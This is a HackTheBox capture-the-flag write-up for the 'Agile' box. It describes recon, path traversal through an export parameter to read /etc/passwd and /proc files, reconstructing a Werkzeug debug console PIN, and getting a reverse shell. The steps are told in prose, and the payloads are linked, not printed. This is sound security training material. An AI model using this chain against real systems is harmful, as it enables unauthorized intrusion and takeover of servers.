HackTheBox Agile Writeup

Published in

MII Cyber Security Consulting Services

6 min readMar 25, 2024

Hello, i want to share how i solve Hackthebox Agile box. this box is fun and quite complicated, but at this moment i only got the user flag, i will continue to solve for the root flag if there more free time :)

Information Gathering

First step is NMAP to enumerate open port and domain name and result open port only in port 22 (ssh) and 80 (http)

Add Domain name for superpass.htb to local DNS in kali linux

Next is scanning web dir using gobuster, and found nothing interesting

Next i explore the whole website and make an account

I found download directory return error and I get information that python libs in /app/venv/lib/python3.10/ and this web use flask

Also from this error page ifound that we can wake console for rce, but we need pin to unlock console, so lets save this clue

while continue explore the web, i try the export button

and we can see in burp, the parameter fn= used to get some file

Exploit

Local File Intrusion

Next I tried to do directory traversal to show /etc/passwd and the server give the response inside /etc/passwd, proved that directory traversal is working in this server, so we can sneek into the server file and we got user name’s like Edwards, Corum, and dev_admin that can do bash, so keep this information

Cracking WerkZeug Pin Console

So i back to the interesting part is to cracking werkzeug console pin and i tried to follow the step from https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug, but i still cannot get the right pin because configuration each flask apps is different, so after many tried and trials and errors, i figure how to crack the werkzeug pin console,

I used the exploit template from https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug

What i need to do now is searching for this param= Username, modname, classname, app.py path, Address, machine-id, and cgroup

Public Bits

Username
To get username we can view /proc/self/environ to see user who start flask: www-data

Modname
flask.app is the flask module name

Name
For this parameter i got from file that i got from the traceback error page and found the app name is located in debuggedapplication function on this file

App.py path
the path we can obtain from the traceback error page that the path containing python script path this path is the absolute flask app.py path

Private Bit

1st Privatebit
to get private bit first we need to know net interface from /proc/net/arp

then we get mac address from /sys/class/net/{interface we get from above step}/address

Then convert mac address to decimal using python so we can pass the value to 1stprivatebit to the exploit script

2nd Privatebit
To fill this variable we need to get machine-id and cgroup, because this variable in exploit script is concatenate of machine-id and cgroup

gaining machine-id

cgroup we need the first line from cgroup file

Then we do a little reverse engineering the werkzeug debugger to get the right value of the cgroup using this code i found from youtube

Then lets pass all value we gather on the above steps to this exploit code to generate the werzeug pin console

The exploit script gave me key 339–183–899 to spawn the werkzeug console and the key is correct

Remote Code Execution

Now lets do reverse shell! First lets start the netcat listener

To use the venv shell locally I used python oneliner reverse shell from https://rcenetsec.com/reverse-shell-one-liner-how-to-do-it/

And i get the low level www-data shell on local venv

Privilege Escalation

In the step what we can do is enumerate anything inside the machine, while enumerating the machine using low level privilege I found clue from the running service that there is mysql service is running